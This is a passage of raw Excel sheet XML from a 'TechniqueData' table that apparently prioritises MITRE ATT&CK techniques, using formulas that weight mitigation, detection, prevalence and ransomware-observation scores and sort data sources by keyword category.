        <f t="array" ref="AM393">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD393)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN393" s="37">
        <v>0</v>
      </c>
      <c r="AO393" s="37">
        <v>1</v>
      </c>
      <c r="AP393" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ393" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>224.90009885714286</v>
      </c>
      <c r="AR393" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS393" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT393" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU39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5.3785737823129249</v>
      </c>
    </row>
    <row r="394" spans="1:47" ht="17">
      <c r="A394" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B394" s="37">
        <f t="shared" si="6"/>
        <v>527.76681533333328</v>
      </c>
      <c r="C394" s="37" t="s">
        <v>1389</v>
      </c>
      <c r="D394" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E394" s="37" t="s">
        <v>1390</v>
      </c>
      <c r="F394" s="37">
        <v>1</v>
      </c>
      <c r="G394" s="37">
        <v>1</v>
      </c>
      <c r="H394" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I394" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J394" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K394" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L394" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M394" s="37">
        <v>0</v>
      </c>
      <c r="N394" s="56">
        <v>0</v>
      </c>
      <c r="O394" s="56">
        <v>4</v>
      </c>
      <c r="P394" s="56">
        <v>0</v>
      </c>
      <c r="Q394" s="56">
        <v>0</v>
      </c>
      <c r="R394" s="57" t="s">
        <v>1391</v>
      </c>
      <c r="S394" s="57">
        <v>10</v>
      </c>
      <c r="T394" s="57" t="s">
        <v>1392</v>
      </c>
      <c r="U394" s="57">
        <v>13</v>
      </c>
      <c r="V394" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.23809533333333333</v>
      </c>
      <c r="W394" s="37">
        <v>23</v>
      </c>
      <c r="X394" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y394" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z394" s="37">
        <v>4</v>
      </c>
      <c r="AA394" s="37">
        <v>0.04</v>
      </c>
      <c r="AB394" s="37">
        <v>0.04</v>
      </c>
      <c r="AC394" s="37"/>
      <c r="AD394" s="50" t="s">
        <v>1393</v>
      </c>
      <c r="AE394" s="37" t="str" cm="1">
        <f t="array" ref="AE394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF394" s="37">
        <v>390</v>
      </c>
      <c r="AG394" s="37" t="str" cm="1">
        <f t="array" ref="AG394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH394" s="37">
        <v>390</v>
      </c>
      <c r="AI394" s="37" t="str" cm="1">
        <f t="array" ref="AI394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD394)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ394" s="37">
        <v>390</v>
      </c>
      <c r="AK394" s="37" t="str" cm="1">
        <f t="array" ref="AK394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL394" s="37">
        <v>390</v>
      </c>
      <c r="AM394" s="37" t="str" cm="1">
        <f t="array" ref="AM394">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD394)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN394" s="37">
        <v>0</v>
      </c>
      <c r="AO394" s="37">
        <v>0</v>
      </c>
      <c r="AP394" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ394" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>175.92227177777775</v>
      </c>
      <c r="AR394" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS394" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT394" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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95" spans="1:47" ht="17">
      <c r="A395" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B395" s="37">
        <f t="shared" si="6"/>
        <v>499.30952380952385</v>
      </c>
      <c r="C395" s="37" t="s">
        <v>1394</v>
      </c>
      <c r="D395" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E395" s="37" t="s">
        <v>1395</v>
      </c>
      <c r="F395" s="37">
        <v>1</v>
      </c>
      <c r="G395" s="37">
        <v>1</v>
      </c>
      <c r="H395" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I395" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J395" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K395" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L395" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M395" s="37">
        <v>0</v>
      </c>
      <c r="N395" s="56">
        <v>0</v>
      </c>
      <c r="O395" s="56">
        <v>2</v>
      </c>
      <c r="P395" s="56">
        <v>0</v>
      </c>
      <c r="Q395" s="56">
        <v>0</v>
      </c>
      <c r="R395" s="57" t="s">
        <v>1396</v>
      </c>
      <c r="S395" s="57">
        <v>9</v>
      </c>
      <c r="T395" s="57" t="s">
        <v>1397</v>
      </c>
      <c r="U395" s="57">
        <v>13</v>
      </c>
      <c r="V395" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21904761904761907</v>
      </c>
      <c r="W395" s="37">
        <v>22</v>
      </c>
      <c r="X395" s="37">
        <v>0.4</v>
      </c>
      <c r="Y395" s="37">
        <v>0.4</v>
      </c>
      <c r="Z395" s="37">
        <v>2</v>
      </c>
      <c r="AA395" s="37">
        <v>0.02</v>
      </c>
      <c r="AB395" s="37">
        <v>0.02</v>
      </c>
      <c r="AC395" s="37"/>
      <c r="AD395" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE395" s="37" t="str" cm="1">
        <f t="array" ref="AE395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD395)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF395" s="37">
        <v>391</v>
      </c>
      <c r="AG395" s="37" t="str" cm="1">
        <f t="array" ref="AG395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD395)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH395" s="37">
        <v>391</v>
      </c>
      <c r="AI395" s="37" t="str" cm="1">
        <f t="array" ref="AI395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD395)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ395" s="37">
        <v>391</v>
      </c>
      <c r="AK395" s="37" t="str" cm="1">
        <f t="array" ref="AK395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD395)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL395" s="37">
        <v>391</v>
      </c>
      <c r="AM395" s="37" t="str" cm="1">
        <f t="array" ref="AM395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD395)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN395" s="37">
        <v>0</v>
      </c>
      <c r="AO395" s="37">
        <v>0</v>
      </c>
      <c r="AP395" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ395" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>166.43650793650795</v>
      </c>
      <c r="AR395" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS395" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT395" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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96" spans="1:47" ht="34">
      <c r="A396" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B396" s="37">
        <f t="shared" si="6"/>
        <v>224.14285714285714</v>
      </c>
      <c r="C396" s="37" t="s">
        <v>1398</v>
      </c>
      <c r="D396" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E396" s="37" t="s">
        <v>1399</v>
      </c>
      <c r="F396" s="37">
        <v>1</v>
      </c>
      <c r="G396" s="37">
        <v>1</v>
      </c>
      <c r="H396" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I396" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J396" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K396" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L396" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M396" s="37">
        <v>0</v>
      </c>
      <c r="N396" s="56">
        <v>0</v>
      </c>
      <c r="O396" s="56">
        <v>2</v>
      </c>
      <c r="P396" s="56">
        <v>5</v>
      </c>
      <c r="Q396" s="56">
        <v>2</v>
      </c>
      <c r="R396" s="57"/>
      <c r="S396" s="57">
        <v>0</v>
      </c>
      <c r="T396" s="57" t="s">
        <v>1400</v>
      </c>
      <c r="U396" s="57">
        <v>0</v>
      </c>
      <c r="V396" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142851E-2</v>
      </c>
      <c r="W396" s="37">
        <v>0</v>
      </c>
      <c r="X396" s="37">
        <v>0</v>
      </c>
      <c r="Y396" s="37">
        <v>0</v>
      </c>
      <c r="Z396" s="37">
        <v>9</v>
      </c>
      <c r="AA396" s="37">
        <v>0.09</v>
      </c>
      <c r="AB396" s="37">
        <v>0.09</v>
      </c>
      <c r="AC396" s="37"/>
      <c r="AD396" s="50" t="s">
        <v>1401</v>
      </c>
      <c r="AE396" s="37" t="str" cm="1">
        <f t="array" ref="AE396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD396)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF396" s="37">
        <v>392</v>
      </c>
      <c r="AG396" s="37" t="str" cm="1">
        <f t="array" ref="AG396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD396)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH396" s="37">
        <v>392</v>
      </c>
      <c r="AI396" s="37" t="str" cm="1">
        <f t="array" ref="AI396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD396)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ396" s="37">
        <v>392</v>
      </c>
      <c r="AK396" s="37" t="str" cm="1">
        <f t="array" ref="AK396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD396)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL396" s="37">
        <v>392</v>
      </c>
      <c r="AM396" s="37" t="str" cm="1">
        <f t="array" ref="AM396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD396)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN396" s="37">
        <v>0</v>
      </c>
      <c r="AO396" s="37"/>
      <c r="AP396" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ396" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>74.714285714285708</v>
      </c>
      <c r="AR396" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS396" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT396" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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97" spans="1:47" ht="17">
      <c r="A397" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B397" s="37">
        <f t="shared" si="6"/>
        <v>157.30000000000001</v>
      </c>
      <c r="C397" s="37" t="s">
        <v>3793</v>
      </c>
      <c r="D397" s="50" t="s">
        <v>1369</v>
      </c>
      <c r="E397" s="37" t="s">
        <v>3794</v>
      </c>
      <c r="F397" s="37">
        <v>1</v>
      </c>
      <c r="G397" s="37">
        <v>1</v>
      </c>
      <c r="H397" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I397" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J397" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K397" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L397" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M397" s="37">
        <v>0</v>
      </c>
      <c r="N397" s="56">
        <v>0</v>
      </c>
      <c r="O397" s="56">
        <v>0</v>
      </c>
      <c r="P397" s="56">
        <v>0</v>
      </c>
      <c r="Q397" s="56">
        <v>0</v>
      </c>
      <c r="R397" s="57"/>
      <c r="S397" s="57"/>
      <c r="T397" s="57"/>
      <c r="U397" s="57"/>
      <c r="V397" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W397" s="37"/>
      <c r="X397" s="37"/>
      <c r="Y397" s="37"/>
      <c r="Z397" s="37"/>
      <c r="AA397" s="37"/>
      <c r="AB397" s="37"/>
      <c r="AC397" s="37"/>
      <c r="AD397" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE397" s="37" t="str" cm="1">
        <f t="array" ref="AE397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD397)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF397" s="37">
        <v>393</v>
      </c>
      <c r="AG397" s="37" t="str" cm="1">
        <f t="array" ref="AG397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD397)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH397" s="37">
        <v>393</v>
      </c>
      <c r="AI397" s="37" t="str" cm="1">
        <f t="array" ref="AI397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD397)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ397" s="37">
        <v>393</v>
      </c>
      <c r="AK397" s="37" t="str" cm="1">
        <f t="array" ref="AK397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD397)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL397" s="37">
        <v>393</v>
      </c>
      <c r="AM397" s="37" t="str" cm="1">
        <f t="array" ref="AM397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD397)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN397" s="37"/>
      <c r="AO397" s="37"/>
      <c r="AP397" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ397" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>52.433333333333337</v>
      </c>
      <c r="AR397" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS397" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT397" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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98" spans="1:47" ht="85">
      <c r="A398" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B398" s="37">
        <f t="shared" si="6"/>
        <v>602.81913880952379</v>
      </c>
      <c r="C398" s="37" t="s">
        <v>1402</v>
      </c>
      <c r="D398" s="50" t="s">
        <v>1403</v>
      </c>
      <c r="E398" s="37"/>
      <c r="F398" s="37">
        <v>1</v>
      </c>
      <c r="G398" s="37">
        <v>1</v>
      </c>
      <c r="H398" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I398" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J398" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K398" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L398" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M398" s="37">
        <v>3.9399999999999998E-2</v>
      </c>
      <c r="N398" s="56">
        <v>0</v>
      </c>
      <c r="O398" s="56">
        <v>1</v>
      </c>
      <c r="P398" s="56">
        <v>0</v>
      </c>
      <c r="Q398" s="56">
        <v>0</v>
      </c>
      <c r="R398" s="57" t="s">
        <v>1404</v>
      </c>
      <c r="S398" s="57">
        <v>6</v>
      </c>
      <c r="T398" s="57" t="s">
        <v>1405</v>
      </c>
      <c r="U398" s="57">
        <v>19</v>
      </c>
      <c r="V398" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24285690476190477</v>
      </c>
      <c r="W398" s="37">
        <v>25</v>
      </c>
      <c r="X398" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y398" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z398" s="37">
        <v>1</v>
      </c>
      <c r="AA398" s="37">
        <v>0.01</v>
      </c>
      <c r="AB398" s="37">
        <v>0.01</v>
      </c>
      <c r="AC398" s="37"/>
      <c r="AD398" s="50" t="s">
        <v>1406</v>
      </c>
      <c r="AE398" s="37" t="str" cm="1">
        <f t="array" ref="AE398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD398)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF398" s="37">
        <v>394</v>
      </c>
      <c r="AG398" s="37" t="str" cm="1">
        <f t="array" ref="AG398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD398)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH398" s="37">
        <v>394</v>
      </c>
      <c r="AI398" s="37" t="str" cm="1">
        <f t="array" ref="AI398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD398)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ398" s="37">
        <v>394</v>
      </c>
      <c r="AK398" s="37" t="str" cm="1">
        <f t="array" ref="AK398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD398)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL398" s="37">
        <v>394</v>
      </c>
      <c r="AM398" s="37" t="str" cm="1">
        <f t="array" ref="AM398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD398)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN398" s="37">
        <v>0</v>
      </c>
      <c r="AO398" s="37">
        <v>0</v>
      </c>
      <c r="AP398" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ398" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>200.93971293650793</v>
      </c>
      <c r="AR398" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS398" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT398" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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99" spans="1:47" ht="34">
      <c r="A399" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
